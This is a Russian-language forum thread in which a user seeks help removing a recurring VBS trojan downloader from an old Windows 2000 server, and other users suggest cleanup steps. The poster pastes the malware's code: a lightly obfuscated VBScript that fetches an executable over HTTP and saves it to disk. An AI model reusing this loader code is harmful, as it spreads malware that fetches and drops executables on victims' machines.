Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
VBS\TrojanDownloader.Small.az, HELP!!!
 
Люди добрые, помогите! На серваке (Microsoft Windows 2000 Server) NOD постоянно ловит два вируса: VBS\TrojanDownloader.Small.az и VBS\TrojanDownloader.Small.NAA. Постоянно создается файл 1.vbs. Пробовали разные антивирусы и червей разными утилитами искали (ясно, что червь где-то засел) - бесполезно. Остальные серваки (Windows 2003 Server) и остальные станции раньше вылетали из сети. Помогла установка Windows 2003 Server SP2 и XP SP3 соответственно. 2000-й сервак пока нужен для работы. Сносить его нельзя. Подскажите, где эта гадина засела. Может, кто сталкивался.
З.Ы. Возможности покупать ПО нет. В серваках пока разбираюсь плохо (можно сказать - почти никак)
 
надо посмотреть что в файле 1.vbs
 
смотря что за сервер,

я бы взял бы, при сомнительной ситуации,
винт с сервака снял, сделал образ, на другой винт, и подцепил его к другому пк,
просканил его на вирусы( каспер, дрвебер, AVZ),
и да посмотрел смотреть какие файлы последние были изменены и тд
( это по холодному)

а если по горячему, просмотрел процессы на сервере,
автозагрузку, что за софт стоит,
потом поставил на сервер AVZ,
обновил её базы, и просканил бы сервер,
возможно каспер еще добавил, со свежеми базами.
да еще не помешало бы может поганять Adware на сервере,
может что то откуда-то притащили, пока шарились в инете.
 
Цитата
Pozi пишет:

                                                               открой  файл 1.vbs и вылажи код сюда поглядим....


LocalPath = "c:\upnt.exe"

Set HTTPGET = CreateObject("Microsoft" & chr(46) & "XMLHTTP")
Set Data = CreateObject("ADODB" & chr(46) & "Stream")

HTTPGET.Open "GET", ExeURL, false
HTTPGET.Send

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2

Data.Type = adTypeBinary
Data.Open
Data.Write HTTPGET.ResponseBody
Data.SaveToFile LocalPath, adSaveCreateOverWrite

З.Ы. причем upnt.exe появляется вместе с 1.vbs и находится не в корне диска С, а в C:\WINNT\system32\dllcache\. И, что самое интересное, скопировал эти upnt.exe и 1.vbs на машину с XP, проверил разными антивирусами - вирусов нет  :( .
 
Цитата
AlphaM AlphaMM пишет:
смотря что за сервер,
Сервак - динозавр - Dell PowerEdge 4200.
Цитата
AlphaM AlphaMM пишет:
может что то откуда-то притащили, пока шарились в инете
до появления вируса к инету не подключался.
Каспер находит те же самые вирусы, дрвеб вообще нифига не находит
 
dem666on1, проверьтесь тут, тут, тут или тут
Страницы: 1
Читают тему